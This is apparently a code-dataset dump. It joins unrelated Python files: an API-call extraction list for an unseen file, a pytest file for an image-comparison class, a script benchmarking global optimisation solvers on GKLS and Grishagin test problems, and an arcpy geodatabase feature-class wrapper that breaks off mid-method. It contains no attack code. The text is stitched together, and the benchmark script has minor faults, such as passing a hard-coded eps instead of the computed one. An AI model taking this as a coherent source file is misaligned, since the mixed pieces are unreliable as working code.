| [((4116, 4131), 'click.command', 'click.command', ([], {}), '()\n', (4129, 4131), False, 'import click\n'), ((4133, 4160), 'click.argument', 'click.argument', (['"""image_url"""'], {}), "('image_url')\n", (4147, 4160), False, 'import click\n'), ((4162, 4201), 'click.option', 'click.option', (['"""--as_root"""'], {'is_flag': '(True)'}), "('--as_root', is_flag=True)\n", (4174, 4201), False, 'import click\n'), ((4203, 4249), 'click.option', 'click.option', (['"""--overlay"""', '"""-o"""'], {'multiple': '(True)'}), "('--overlay', '-o', multiple=True)\n", (4215, 4249), False, 'import click\n'), ((4251, 4286), 'click.argument', 'click.argument', (['"""command"""'], {'nargs': '(-1)'}), "('command', nargs=-1)\n", (4265, 4286), False, 'import click\n'), ((604, 619), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (614, 619), False, 'from os.path import expanduser, join, exists, basename\n'), ((1738, 1762), 'requests.head', 'requests.head', (['image_url'], {}), '(image_url)\n', (1751, 1762), False, 'import requests\n'), ((3134, 3150), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (3148, 3150), False, 'import hashlib\n'), ((3166, 3202), 'requests.get', 'requests.get', (['image_url'], {'stream': '(True)'}), '(image_url, stream=True)\n', (3178, 3202), False, 'import requests\n'), ((1034, 1071), 'os.path.join', 'join', (['CACHE_PATH', "('url_' + cache_hash)"], {}), "(CACHE_PATH, 'url_' + cache_hash)\n", (1038, 1071), False, 'from os.path import expanduser, join, exists, basename\n'), ((1084, 1100), 'os.path.exists', 'exists', (['cache_fn'], {}), '(cache_fn)\n', (1090, 1100), False, 'from os.path import expanduser, join, exists, basename\n'), ((1505, 1542), 'os.path.join', 'join', (['CACHE_PATH', "('url_' + cache_hash)"], {}), "(CACHE_PATH, 'url_' + cache_hash)\n", (1509, 1542), False, 'from os.path import expanduser, join, exists, basename\n'), ((1551, 1582), 'shutil.move', 'shutil.move', (['filename', 'cache_fn'], {}), '(filename, cache_fn)\n', (1562, 1582), False, 'import shutil\n'), ((3212, 3244), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (3230, 3244), False, 'from tempfile import NamedTemporaryFile\n'), ((803, 821), 'os.path.exists', 'exists', (['CACHE_PATH'], {}), '(CACHE_PATH)\n', (809, 821), False, 'from os.path import expanduser, join, exists, basename\n'), ((835, 863), 'os.makedirs', 'os.makedirs', (['CACHE_PATH', '(448)'], {}), '(CACHE_PATH, 448)\n', (846, 863), False, 'import os\n'), ((1126, 1143), 'os.stat', 'os.stat', (['cache_fn'], {}), '(cache_fn)\n', (1133, 1143), False, 'import os\n'), ((1172, 1214), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['file_stat.st_mtime'], {}), '(file_stat.st_mtime)\n', (1194, 1214), False, 'from datetime import datetime\n'), ((3064, 3083), 'os.path.basename', 'basename', (['image_url'], {}), '(image_url)\n', (3072, 3083), False, 'from os.path import expanduser, join, exists, basename\n'), ((4746, 4763), 'hashlib.sha256', 'sha256', (['image_url'], {}), '(image_url)\n', (4752, 4763), False, 'from hashlib import sha256\n')] |
from DocTest.CompareImage import CompareImage
import pytest
from pathlib import Path
import numpy
def test_single_png(testdata_dir):
img = CompareImage(testdata_dir / 'text_big.png')
assert len(img.opencv_images)==1
assert type(img.opencv_images)==list
type(img.opencv_images[0])==numpy.ndarray
def test_single_pdf(testdata_dir):
pass
def test_multipage_pdf(testdata_dir):
pass
def test_huge_pdf(testdata_dir):
pass
def test_image_text_content(testdata_dir):
pass
def test_pdf_text_content(testdata_dir):
pass
def test_non_existing_file(testdata_dir):
with pytest.raises(AssertionError):
img = CompareImage(testdata_dir / 'does_not_exist.png')
def test_corrupt_image(testdata_dir):
with pytest.raises(AssertionError):
img = CompareImage(testdata_dir / 'corrupt_image.png')
def test_corrupt_pdf(testdata_dir):
with pytest.raises(AssertionError):
img = CompareImage(testdata_dir / 'corrupt_pdf.pdf')
| [
"DocTest.CompareImage.CompareImage",
"pytest.raises"
]
| [((144, 187), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'text_big.png')"], {}), "(testdata_dir / 'text_big.png')\n", (156, 187), False, 'from DocTest.CompareImage import CompareImage\n'), ((604, 633), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (617, 633), False, 'import pytest\n'), ((649, 698), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'does_not_exist.png')"], {}), "(testdata_dir / 'does_not_exist.png')\n", (661, 698), False, 'from DocTest.CompareImage import CompareImage\n'), ((755, 784), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (768, 784), False, 'import pytest\n'), ((800, 848), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'corrupt_image.png')"], {}), "(testdata_dir / 'corrupt_image.png')\n", (812, 848), False, 'from DocTest.CompareImage import CompareImage\n'), ((895, 924), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (908, 924), False, 'import pytest\n'), ((940, 986), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'corrupt_pdf.pdf')"], {}), "(testdata_dir / 'corrupt_pdf.pdf')\n", (952, 986), False, 'from DocTest.CompareImage import CompareImage\n')] |
import functools
import numpy as np
import math
import argparse
import ags_solver
import go_problems
import nlopt
import sys
from Simple import SimpleTuner
import itertools
from scipy.spatial import Delaunay
from scipy.optimize import differential_evolution
from scipy.optimize import basinhopping
from sdaopt import sda
from stochopy import Evolutionary
from pyOpt import Optimization
from pyOpt import MIDACO
import pyOpt
from shgo import shgo
from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass
from benchmark_tools.plot import plot_cmcs
from benchmark_tools.stats import save_stats, compute_stats
class AGSWrapper(Solver):
def __init__(self, dist_stop, max_iters, class_name, eps=0.01, mixedFast=False):
params = self.class_name2params(class_name)
params.mixedFastMode = mixedFast
if dist_stop:
params.eps = 0
params.itersLimit = max_iters
self.solver = ags_solver.Solver()
self.solver.SetParameters(params)
self.dist_stop = dist_stop
self.eps = eps
def class_name2params(self, name):
params = ags_solver.Parameters()
if 'grish' in name:
params.r = 3
elif 'gklss2' in name:
params.r = 4.6
elif 'gklsh2' in name:
params.r = 6.5
elif 'gklss3' in name:
params.r = 3.7
elif 'gklsh3' in name:
params.r = 4.4
elif 'gklss4' in name:
params.r = 4.7
elif 'gklsh4' in name:
params.r = 4.9
elif 'gklss5' in name:
params.r = 4
params.evolventDensity = 10
elif 'gklsh5' in name:
params.r = 4
params.evolventDensity = 10
return params
def Solve(self, problem):
self.solver.SetProblem([lambda x: problem.Calculate(x)], *problem.GetBounds())
#self.solver.SetProblem(problem)
if not self.dist_stop:
point, val, idx = self.solver.Solve()
else:
opt_pt = np.array(problem.GetOptimumPoint())
point, val, idx = self.solver.Solve(lambda x: np.linalg.norm(np.array(x)-opt_pt, np.inf) < self.eps)
#calcCounters = self.solver.GetCalculationsStatistics()
calcCounters = problem.GetCalculationsStatistics()
return point, val, calcCounters
class SDAWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.class_name = class_name
def Solve(self, problem):
lb, ub = problem.GetBounds()
ret = sda(lambda x: problem.Calculate(x), None, bounds=list(zip(lb, ub)), \
seed=100, maxfun=self.max_iters, visit=2.72, maxiter=self.max_iters)
n_evals = problem.GetCalculationsStatistics()
return ret.x, ret.fun, n_evals
class SCBasinhoppingWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.class_name = class_name
def Solve(self, problem):
lb, ub = problem.GetBounds()
#pop_size = self.class_name2params(self.class_name)
class MyBounds(object):
def __init__(self, xmax=[1.1,1.1], xmin=[-1.1,-1.1] ):
self.xmax = np.array(xmax)
self.xmin = np.array(xmin)
def __call__(self, **kwargs):
x = kwargs["x_new"]
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
return tmax and tmin
x0 = [.5]*problem.GetDimension()
result = \
basinhopping(lambda x: problem.Calculate(x), x0, accept_test=MyBounds(ub, lb), seed=100, T=10, stepsize=0.3)
n_evals = problem.GetCalculationsStatistics()
return result.x, result.fun, n_evals
class SCDEWrapper(Solver):
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.class_name = class_name
def class_name2params(self, name):
if 'grish' in name:
popsize = 60
elif 'gklss2' in name:
popsize = 60
elif 'gklsh2' in name:
popsize = 60
elif 'gklss3' in name:
popsize = 70
elif 'gklsh3' in name:
popsize = 80
elif 'gklss4' in name:
popsize = 90
elif 'gklsh4' in name:
popsize = 100
elif 'gklss5' in name:
popsize = 120
elif 'gklsh5' in name:
popsize = 140
return popsize
def Solve(self, problem):
lb, ub = problem.GetBounds()
bounds = [(l, u) for l, u in zip(lb, ub)]
pop_size = self.class_name2params(self.class_name)
result = \
differential_evolution(
lambda x: problem.Calculate(x), bounds, mutation=(1.1,1.9),
tol=1e-12, maxiter=int(float(self.max_iters) / (pop_size*problem.GetDimension())), popsize=pop_size, disp=False, seed=100)
n_evals = problem.GetCalculationsStatistics()
return result.x, result.fun, n_evals
class PyEvolveWrapper(Solver):
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
def Solve(self, problem):
# pyevolve is only needed by this solver and is not among the module-level
# imports above, so import it lazily here
from pyevolve import G1DList, GSimpleGA, Selectors, Initializators, Mutators, Consts
lb, ub = problem.GetBounds()
# Genome instance
genome = G1DList.G1DList(2)
genome.setParams(rangemin=lb[0], rangemax=ub[0], bestRawScore=-100, roundDecimal=2)
genome.initializator.set(Initializators.G1DListInitializatorReal)
genome.mutator.set(Mutators.G1DListMutatorRealGaussian)
# The evaluator function (objective function)
genome.evaluator.set(lambda x: problem.Calculate(x) + 100)
# Genetic Algorithm Instance
ga = GSimpleGA.GSimpleGA(genome)
ga.selector.set(Selectors.GRouletteWheel)
ga.minimax = Consts.minimaxType["minimize"]
ga.setGenerations(5000)
ga.setMutationRate(0.05)
ga.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
# Do the evolution, with stats dump
# frequency of 10 generations
ga.evolve(freq_stats=100)
# Best individual
best = ga.bestIndividual()
print ("\nBest individual score: %.2f" % (best.score - 100,))
print (best)
from bayes_opt import BayesianOptimization
class BOptWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
def Solve(self, problem):
lb, ub = problem.GetBounds()
bo = BayesianOptimization(lambda x, y: -problem.Calculate([x, y]),
{'x': (lb[0], ub[0]), 'y': (lb[1], ub[1])})
bo.maximize(init_points=5, n_iter=20, kappa=1.5)
n_evals = problem.GetCalculationsStatistics()
opt_val = -bo.res['max']['max_val']
opt_point = [bo.res['max']['max_params']['x'], bo.res['max']['max_params']['y']]
return opt_point, opt_val, n_evals
class SimpleWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.exploration = self.class_name2params(class_name)
def class_name2params(self, name):
if 'grish' in name:
return 0.1
elif 'gklss2' in name:
return 0.15
elif 'gklsh2' in name:
return 0.15
elif 'gklss3' in name:
return 0.15
elif 'gklsh3' in name:
return 0.25
elif 'gklss4' in name:
return 0.2
elif 'gklsh4' in name:
return 0.25
def Solve(self, problem):
objective_function = lambda x: -problem.Calculate(x)
lb, ub = problem.GetBounds()
opt_pt = problem.GetOptimumPoint()
bounds = [[l, u] for l, u in zip(lb, ub)]
points = np.array([point for point in itertools.product(*bounds)])
tri = Delaunay(points)
optimization_domain_vertices = points[tri.simplices]
exploration = self.exploration # optional, default 0.15
tuner = SimpleTuner(optimization_domain_vertices, objective_function, \
exploration_preference=exploration,
stop_criterion=lambda x:np.linalg.norm(np.array(x)-opt_pt, np.inf) < self.eps)
tuner.optimize(self.max_iters)
opt_val, opt_point = tuner.get_best()
#tuner.plot() # only works in 2D
n_evals = problem.GetCalculationsStatistics()
return opt_point, -opt_val, n_evals
class NLOptWrapper:
def __init__(self, dist_stop, max_iters, class_name, method=nlopt.GD_STOGO, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.method = method
self.max_iters = max_iters
self.pop_size = self.class_name2params(class_name)
def class_name2params(self, name):
if 'grish' in name:
popsize = 150
elif 'gklss2' in name:
popsize = 200
elif 'gklsh2' in name:
popsize = 400
elif 'gklss3' in name:
popsize = 1000
elif 'gklsh3' in name:
popsize = 2000
elif 'gklss4' in name:
popsize = 8000
elif 'gklsh4' in name:
popsize = 16000
elif 'gklss5' in name:
popsize = 25000
elif 'gklsh5' in name:
popsize = 30000
return popsize
def Solve(self, problem):
lb, ub = problem.GetBounds()
self.opt = nlopt.opt(self.method, problem.GetDimension())
self.opt.set_local_optimizer(nlopt.opt(nlopt.LN_SBPLX, problem.GetDimension()))
self.opt.set_lower_bounds(lb)
self.opt.set_upper_bounds(ub)
self.opt.set_min_objective(lambda x, grad: problem.Calculate(x))
self.opt.set_maxeval(self.max_iters)
self.opt.set_xtol_rel(1e-13)
if self.method == nlopt.GN_CRS2_LM:
self.opt.set_population(self.pop_size)
x = self.opt.optimize([.5]*problem.GetDimension())
minf = self.opt.last_optimum_value()
n_evals = problem.GetCalculationsStatistics()
return x, minf, n_evals
class StochOpyWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.popsize = self.class_name2params(class_name)
def class_name2params(self, name):
if 'grish' in name:
popsize = 60
elif 'gklss2' in name:
popsize = 60
elif 'gklsh2' in name:
popsize = 60
elif 'gklss3' in name:
popsize = 70
elif 'gklsh3' in name:
popsize = 80
elif 'gklss4' in name:
popsize = 90
elif 'gklsh4' in name:
popsize = 100
elif 'gklss5' in name:
popsize = 120
elif 'gklsh5' in name:
popsize = 140
return popsize
def Solve(self, problem):
objective_function = lambda x: 50 + problem.Calculate(x)
lb, ub = problem.GetBounds()
ea = Evolutionary(objective_function, lower=lb, upper=ub, popsize=self.popsize, \
max_iter=int(self.max_iters/self.popsize), eps1=1e-16, eps2=1e-16)
xopt, gfit = ea.optimize(solver='cpso', sync=False, CR=0.4, F=0.5)
n_evals = problem.GetCalculationsStatistics()
return xopt, gfit, n_evals
class PyOptWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
def Solve(self, problem):
objective_function = lambda x: [problem.Calculate(x), 0, 0]
lb, ub = problem.GetBounds()
opt_prob = pyOpt.Optimization('Problem', objective_function)
opt_prob.addObj('f')
for i in range(problem.GetDimension()):
opt_prob.addVar('x'+str(i),'c',lower=lb[i],upper=ub[i],value=(lb[i] + ub[i])/2.)
midaco_none = MIDACO(pll_type=None)
midaco_none.setOption('IPRINT',-1)
midaco_none.setOption('ISEED', 100)
midaco_none.setOption('MAXEVAL',self.max_iters)
midaco_none.setOption('FOCUS', -4)
fstr, xstr, inform = midaco_none(opt_prob)
n_evals = problem.GetCalculationsStatistics()
return xstr, fstr[0], n_evals
class SHGOWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
def Solve(self, problem):
objective_function = lambda x: problem.Calculate(x)
bounds = zip(*problem.GetBounds())
opts = {'maxfev': self.max_iters}
result = shgo(objective_function, bounds, options=opts)
n_evals = problem.GetCalculationsStatistics()
return result.x, result.fun, n_evals
algos = {'scd': SCDEWrapper, 'ags': AGSWrapper,
'agsd': functools.partial(AGSWrapper, mixedFast=True),
'direct': functools.partial(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT),
'directl': functools.partial(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT_L),
'stogo': functools.partial(NLOptWrapper, method=nlopt.GD_STOGO),
'mlsl': functools.partial(NLOptWrapper, method=nlopt.G_MLSL_LDS),
'crs': functools.partial(NLOptWrapper, method=nlopt.GN_CRS2_LM),
'simple': SimpleWrapper, 'scb': SCBasinhoppingWrapper,
'sda': SDAWrapper, 'stochopy': StochOpyWrapper, 'shgo': SHGOWrapper,
'pyopt': PyOptWrapper}
algo2cature = {'scd': 'Scipy DE', 'ags': 'AGS', 'direct': 'DIRECT', 'agsd': 'AGSd',
'directl': 'DIRECTl', 'simple': 'Simple',
'stogo': 'StoGO', 'mlsl': 'MLSL', 'crs':'CRS', 'scb': 'Scipy B-H',
'sda': 'SDA', 'stochopy': 'Stochopy', 'pysot': 'PySOT', 'pyopt': 'PyOpt', 'shgo': 'SHGO'}
serg_eps = {2: 0.01, 3: 0.01, 4: math.pow(1e-6, 1./4), 5: math.pow(1e-7, 1./5)}
def main(args):
wrapper_class = algos[args.algo]
if args.problems_class == 'grish':
problems = GrishClass()
else:
assert args.problems_dim > 1 and args.problems_dim < 6
if args.problems_class == 'gklss':
problems = GKLSClass(args.problems_dim, go_problems.GKLSClass.Simple)
else:
problems = GKLSClass(args.problems_dim, go_problems.GKLSClass.Hard)
eps = 0.01
if args.serg_eps:
eps = serg_eps[args.problems_dim]
wrapper = wrapper_class(args.dist_stop, args.max_iters, args.problems_class+str(args.problems_dim), eps=0.01)
calc_stats, solved_status = solve_class(problems, wrapper, verbose=args.verbose, eps_check=eps)
stats = compute_stats(calc_stats, solved_status)
print('Problems solved: {}'.format(stats['num_solved']))
for i, avg in enumerate(stats['avg_calcs'][:-1]):
print('Average number of calculations of constraint #{}: {}'.format(i, avg))
print('Average number of calculations of objective: {}'.format(stats['avg_calcs'][-1]))
#plot_cmcs([stats['cmc']], captures=[algo2cature(args.algo)], show=True, filename='')
save_stats(stats, args.stats_fname, capture=algo2cature[args.algo])
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sample for AGS solver')
parser.add_argument('--max_iters', type=int, default=10000, help='limit of iterations for the method')
parser.add_argument('--problems_class', type=str, choices=['grish','gklss','gklsh'], default='grish')
parser.add_argument('--algo', type=str, choices=algos.keys(), default='scd')
parser.add_argument('--problems_dim', type=int, default=2)
parser.add_argument('--verbose', action='store_true', help='Print additional info to console')
parser.add_argument('--dist_stop', action='store_true', help='Stop algorithm then the next point is close enough to the optimum')
parser.add_argument('--serg_eps', action='store_true')
parser.add_argument('--stats_fname', type=str, default='')
main(parser.parse_args())
| [
"benchmark_tools.core.solve_class",
"argparse.ArgumentParser",
"benchmark_tools.core.GrishClass",
"math.pow",
"benchmark_tools.stats.save_stats",
"benchmark_tools.stats.compute_stats",
"itertools.product",
"benchmark_tools.core.GKLSClass",
"numpy.array",
"functools.partial",
"shgo.shgo",
"pyOpt.MIDACO",
"scipy.spatial.Delaunay",
"ags_solver.Solver",
"numpy.all",
"ags_solver.Parameters",
"pyOpt.Optimization"
]
| [((13158, 13203), 'functools.partial', 'functools.partial', (['AGSWrapper'], {'mixedFast': '(True)'}), '(AGSWrapper, mixedFast=True)\n', (13175, 13203), False, 'import functools\n'), ((13224, 13284), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GN_ORIG_DIRECT'}), '(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT)\n', (13241, 13284), False, 'import functools\n'), ((13306, 13368), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GN_ORIG_DIRECT_L'}), '(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT_L)\n', (13323, 13368), False, 'import functools\n'), ((13388, 13442), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GD_STOGO'}), '(NLOptWrapper, method=nlopt.GD_STOGO)\n', (13405, 13442), False, 'import functools\n'), ((13461, 13517), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.G_MLSL_LDS'}), '(NLOptWrapper, method=nlopt.G_MLSL_LDS)\n', (13478, 13517), False, 'import functools\n'), ((13535, 13591), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GN_CRS2_LM'}), '(NLOptWrapper, method=nlopt.GN_CRS2_LM)\n', (13552, 13591), False, 'import functools\n'), ((14130, 14154), 'math.pow', 'math.pow', (['(1e-06)', '(1.0 / 4)'], {}), '(1e-06, 1.0 / 4)\n', (14138, 14154), False, 'import math\n'), ((14155, 14179), 'math.pow', 'math.pow', (['(1e-07)', '(1.0 / 5)'], {}), '(1e-07, 1.0 / 5)\n', (14163, 14179), False, 'import math\n'), ((14821, 14888), 'benchmark_tools.core.solve_class', 'solve_class', (['problems', 'wrapper'], {'verbose': 'args.verbose', 'eps_check': 'eps'}), '(problems, wrapper, verbose=args.verbose, eps_check=eps)\n', (14832, 14888), False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((14901, 14941), 'benchmark_tools.stats.compute_stats', 'compute_stats', (['calc_stats', 'solved_status'], {}), '(calc_stats, solved_status)\n', (14914, 14941), False, 'from benchmark_tools.stats import save_stats, compute_stats\n'), ((15330, 15397), 'benchmark_tools.stats.save_stats', 'save_stats', (['stats', 'args.stats_fname'], {'capture': 'algo2cature[args.algo]'}), '(stats, args.stats_fname, capture=algo2cature[args.algo])\n', (15340, 15397), False, 'from benchmark_tools.stats import save_stats, compute_stats\n'), ((15439, 15499), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Sample for AGS solver"""'}), "(description='Sample for AGS solver')\n", (15462, 15499), False, 'import argparse\n'), ((944, 963), 'ags_solver.Solver', 'ags_solver.Solver', ([], {}), '()\n', (961, 963), False, 'import ags_solver\n'), ((1121, 1144), 'ags_solver.Parameters', 'ags_solver.Parameters', ([], {}), '()\n', (1142, 1144), False, 'import ags_solver\n'), ((8158, 8174), 'scipy.spatial.Delaunay', 'Delaunay', (['points'], {}), '(points)\n', (8166, 8174), False, 'from scipy.spatial import Delaunay\n'), ((11978, 12027), 'pyOpt.Optimization', 'pyOpt.Optimization', (['"""Problem"""', 'objective_function'], {}), "('Problem', objective_function)\n", (11996, 12027), False, 'import pyOpt\n'), ((12220, 12241), 'pyOpt.MIDACO', 'MIDACO', ([], {'pll_type': 'None'}), '(pll_type=None)\n', (12226, 12241), False, 'from pyOpt import MIDACO\n'), ((12946, 12992), 'shgo.shgo', 'shgo', (['objective_function', 'bounds'], {'options': 'opts'}), '(objective_function, bounds, options=opts)\n', (12950, 12992), False, 'from shgo import shgo\n'), ((14290, 14302), 'benchmark_tools.core.GrishClass', 'GrishClass', ([], {}), '()\n', (14300, 14302), 
False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((14442, 14500), 'benchmark_tools.core.GKLSClass', 'GKLSClass', (['args.problems_dim', 'go_problems.GKLSClass.Simple'], {}), '(args.problems_dim, go_problems.GKLSClass.Simple)\n', (14451, 14500), False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((14538, 14594), 'benchmark_tools.core.GKLSClass', 'GKLSClass', (['args.problems_dim', 'go_problems.GKLSClass.Hard'], {}), '(args.problems_dim, go_problems.GKLSClass.Hard)\n', (14547, 14594), False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((3378, 3392), 'numpy.array', 'np.array', (['xmax'], {}), '(xmax)\n', (3386, 3392), True, 'import numpy as np\n'), ((3421, 3435), 'numpy.array', 'np.array', (['xmin'], {}), '(xmin)\n', (3429, 3435), True, 'import numpy as np\n'), ((3542, 3564), 'numpy.all', 'np.all', (['(x <= self.xmax)'], {}), '(x <= self.xmax)\n', (3548, 3564), True, 'import numpy as np\n'), ((3594, 3616), 'numpy.all', 'np.all', (['(x >= self.xmin)'], {}), '(x >= self.xmin)\n', (3600, 3616), True, 'import numpy as np\n'), ((8115, 8141), 'itertools.product', 'itertools.product', (['*bounds'], {}), '(*bounds)\n', (8132, 8141), False, 'import itertools\n'), ((2144, 2155), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (2152, 2155), True, 'import numpy as np\n'), ((8487, 8498), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (8495, 8498), True, 'import numpy as np\n')] |
import arcpy
import logging
import pathlib
import subprocess
import gdb
import cx_sde
class Fc(object):
def __init__(self
,gdb
,name):
# gdb object
self.gdb = gdb
# ex BUILDING
self.name = name.upper()
# esri tools usually expect this C:/sdefiles/bldg.sde/BUILDING
# also acceptable: C:/sdefiles/bldg.sde/BLDG.BUILDING
self.featureclass = self.gdb.sdeconn + "/" + self.name
def getfields(self):
desc = arcpy.Describe(self.featureclass)
fields = desc.fields
fieldsameslist = []
for field in fields:
fieldsameslist.append(field.name)
return fieldsameslist
def exists(self):
return arcpy.Exists(self.featureclass)
def delete(self):
logging.info('deleting {0}'.format(self.name))
desc = arcpy.Describe(self.featureclass)
if desc.IsArchived == True:
# disable archving and axe the _H table
arcpy.DisableArchiving_management(self.featureclass,
'DELETE')
arcpy.Delete_management(self.featureclass)
def locksexist(self):
if arcpy.TestSchemaLock(self.featureclass):
# "True A schema lock can be applied to the dataset"
return False
else:
return True
def interpret(self
,resobject):
# could also work with resobject.status
output = 0
if 'succeeded' not in resobject.getMessages().lower():
output = 1
logging.warn('response code is {0}'.format(resobject.status))
logging.warn('response messages are {0}'.format(resobject.getMessages()))
return output
def version(self):
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/register-as-versioned.htm
logging.info('versioning {0}'.format(self.name))
arcpy.RegisterAsVersioned_management(self.featureclass
,"NO_EDITS_TO_BASE")
# https://support.esri.com/en/technical-article/000023226
# When an ArcGIS 10.8 / ArcGIS Pro 2.5 (or newer) client connects to a
# 10.7.1, or earlier, release of an Enterprise geodatabase in Oracle,
# and registers the data as versioned, the versioned view is not created
# for the associated table or feature class.
        # I can't get this shell-out to python27 to work,
        # so like a dummy I'm gonna print it to the screen for now.
        # The test will fail until I (or esri) get it right; that's honest at least.
py2versionedviews = pathlib.Path(__file__).parent.parent \
.joinpath('py27') \
.joinpath('create_versionedviews.py')
# see gdb class for this path, perhaps 'C:\Python27\ArcGIS10.6'
callcmd = r'{0} {1} {2}'.format(self.gdb.arcpy2path, py2versionedviews, self.name)
logging.info('YOU MUST CREATE versioned views from py27 using {0}'.format(callcmd))
logging.info('YOU YES YOU MUST call this: {0}'.format(callcmd))
# From a script run a postprocess something like:
# C:\Python27\ArcGIS10.6\python.exe C:\matt_projects\geodatabase-toiler\src\py27\create_versionedviews.py TOILERTESTFC
# exit_code = subprocess.call(callcmd,shell=True)
# exit_code = subprocess.run([self.gdb.arcpy2path, 'C:\matt_projects\geodatabase-toiler\src\py27\create_versionedviews.py'])
# subprocess.Popen(["virtualenv1/bin/python", "my_script.py"])
# attempts above yield
# File "C:\Program Files\ArcGIS\Pro\bin\Python\envs\arcgispro-py3\Lib\site.py", line 177
#file=sys.stderr)
# ^
# SyntaxError: invalid syntax
def trackedits(self):
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/enable-editor-tracking.htm
        # this will create fields only if they don't exist
# I am gonna fix the field names here. Reminder that our goal is to
# be opinionated and consistent across anything we manage
logging.info('enabling editor tracking on {0}'.format(self.name))
return self.interpret(arcpy.EnableEditorTracking_management(self.featureclass
,'CREATED_USER'
,'CREATED_DATE'
,'LAST_EDITED_USER'
,'LAST_EDITED_DATE'
,'NO_ADD_FIELDS'
,'UTC'))
def grantprivileges(self
,user
,edits='GRANT'): # or AS_IS
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/change-privileges.htm
        # caller should know who the editors are; we don't concern ourselves with that here
        # always grant select; edits is GRANT, or AS_IS to grant select only
        # The knobs and dials on this tool are confounding
logging.info('granting privileges on {0} to {1}'.format(self.name
,user))
return self.interpret(arcpy.ChangePrivileges_management(self.featureclass
,user
,'GRANT'
,edits))
def index(self
,column):
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/add-attribute-index.htm
# unique indexes cant be specified for multiversioned tables
logging.info('indexing column {0} on {1}'.format(column
,self.name))
# BUILDINGBINIX
# BUILDING_HISTORICDOITT_IDIX = 27 careful friend
return self.interpret(arcpy.AddIndex_management(self.featureclass
,column
,'{0}{1}{2}'.format(self.name
,column
,'IX')))
def analyze(self
,components=['BUSINESS','ADDS','DELETES']):
return self.interpret(arcpy.Analyze_management(self.featureclass
,components))
def rebuildindexes(self):
# https://pro.arcgis.com/en/pro-app/latest/tool-reference/data-management/rebuild-indexes.htm
return self.interpret(arcpy.RebuildIndexes_management(self.gdb.sdeconn
,'NO_SYSTEM'
,self.name
,'ALL'))
def enablearchiving(self):
desc = arcpy.Describe(self.featureclass)
if desc.IsArchived == False:
return self.interpret(arcpy.EnableArchiving_management(self.featureclass))
else:
return 0
def exporttoshp(self
,outputdir
,outputname):
# print('fc2fc {0} {1} {2}'.format(self.featureclass, outputdir, outputname))
arcpy.FeatureClassToFeatureClass_conversion(self.featureclass
,outputdir
,outputname)
    # TODO exporttogeopackage if ESRI ever fills in some functionality in
# https://pro.arcgis.com/en/pro-app/latest/tool-reference/conversion/an-overview-of-the-to-geopackage-toolset.htm
    # TODO exporttogeojson if ESRI tool does something other than error 99999 (guess: sdo_geometry not supported)
# For now export to shp, then ogr2ogr to other formats. Classic
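    # Not part of the original module: a sketch of the "export to shp, then
    # ogr2ogr" workflow described above. It assumes ogr2ogr (GDAL) is on the
    # PATH and that exporttoshp has already written <outputname>.shp into
    # <outputdir>; the method name and arguments are illustrative only.
    def exporttogeopackage(self
                          ,outputdir
                          ,outputname
                          ,gpkgpath):
        shppath = pathlib.Path(outputdir).joinpath('{0}.shp'.format(outputname))
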